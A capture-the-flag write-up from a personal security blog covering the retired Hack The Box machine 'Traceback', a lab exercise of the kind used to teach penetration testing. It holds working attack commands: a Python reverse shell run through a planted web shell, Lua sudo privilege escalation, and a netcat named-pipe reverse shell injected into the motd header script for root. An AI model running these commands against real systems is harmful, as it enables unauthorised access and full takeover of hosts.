Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Traceback

Name: Traceback
Release Date: 14 Mar 2020
Retire Date: 15 Aug 2020
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
sampriti 00 days, 00 hours, 08 mins, 19 seconds
sampriti 00 days, 00 hours, 15 mins, 17 seconds
Creator: Xh4H
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./Traceback 10.10.10.181

 
$ nmap -sC -sV -Pn -p- -oA ./Traceback 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 13:30 EDT
Nmap scan report for 10.10.10.181
Host is up (0.059s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.71 seconds

We've got HTTP and SSH on a their standard ports.  Let's start with the HTTP info and go from there.

Checking the HTML source gives us:

 

<!--Some of the best web shells that you might need ;)-->

 

I seem to remember something on this somewhere, so let's jump to Google and verify.

Well, at least we now have a list of filenames we can easily Gobuster with.....

 

Dump the file names into a shells.txt file and Gobust away.

 
$ gobuster dir -u http://10.10.10.181 -w shells.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.181
[+] Threads:        10
[+] Wordlist:       shells.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/26 13:39:49 Starting gobuster
===============================================================
/smevk.php (Status: 200)
===============================================================
2020/08/26 13:39:51 Finished
===============================================================

Got one!  smevk.php is my page.  If we look at that GitHub page and the source of smevk.php, we find the creds are admin:admin 

So, we log in and ...... Huh?  smevk the crap?!?!  After my eyes stop bleeding, we see that we have the ability to execute system commands. Let's (please GOD) use this to gain a reverse shell because looking at SmEvK v3 is seriously damaging to my eyeballs.  Drop:

 

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

into the Execute section (after starting an nc -lvnp 9999 of course) and run it.  Sweet Merciful Computer Gods, we have a shell and can at least minimize the craziness.  Now, instead of worrying about the LinEnum script just yet, I'm going to jump over to the webadmin user's Home directory first.  In there we find a note.txt

We have this mention of Lua and to a sysadmin.  So, first let's check sudo -l and see what we can actually do.

 

$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

 

We can run "luvit" as sysadmin, but we can't see what exactly it does (except we know it executes lua code).  Let's try this:

 

echo "require('os');" > priv.lua
echo "os.execute('/bin/bash');" >> priv.lua

sudo -u sysadmin /home/sysadmin/luvit ./priv.lua

 

Success!! We are now sysadmin.  Bash -i gets a better interactive shell.  Grab the user flag and onward to root.

It's a good thing that we haven't tried any scripts yet.  We unfortunately need to jump BACK to the SmEvK console and upload PSPY64.  It'll take some doing, as in you'll have to disconnect the reverse shell, upload it, and then jump back to sysadmin, but once you have it running (which you'll have to disconnect AGAIN to stop running it [maybe I should have made ssh keys as a stop-gap......]) you'll see that update-motd.d runs every 30 seconds or so.

 

/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

 

Well, crap.  It looks like I should have created those ssh keys because I need the 00-header inside of update-motd.d to run when I ssh to the system.  So, here goes.  I copy my key into the authorized_keys file (no I'm not publishing it here) set up the replacement header as:

 

echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc 10.10.14.7 4444 >/tmp/p' > /etc/update-motd.d/00-header

 

and here's where speed is of the essence.  It's nc -lvnp 4444; echo to replace the header, and then immediate ssh -i sysadmin_traceback sysadmin@10.10.10.181.  You have only 30 seconds to complete the task.